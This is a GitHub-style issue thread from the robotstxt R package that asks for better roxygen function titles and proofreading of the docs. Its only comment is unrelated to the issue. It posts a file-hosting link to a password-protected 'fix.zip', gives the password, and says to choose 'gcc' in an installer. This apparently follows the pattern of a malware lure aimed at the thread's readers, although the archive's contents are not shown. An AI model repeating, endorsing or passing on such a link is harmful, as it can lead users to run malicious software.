### ISSUE TITLE
Update roxygen function documentation

### ISSUE THREAD

**Issue by jrdnbradford** [petermeissner/robotstxt#87]
Many `@title`s in the docs are just the name of the function and need to be a bit more descriptive. See [R Packages (2e) on `@title`s](https://r-pkgs.org/man.html#title).

Perform general proofreading of docs (for instance, fix the misspelled function [`null_to_defeault`](https://docs.ropensci.org/robotstxt/reference/null_to_defeault.html).

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
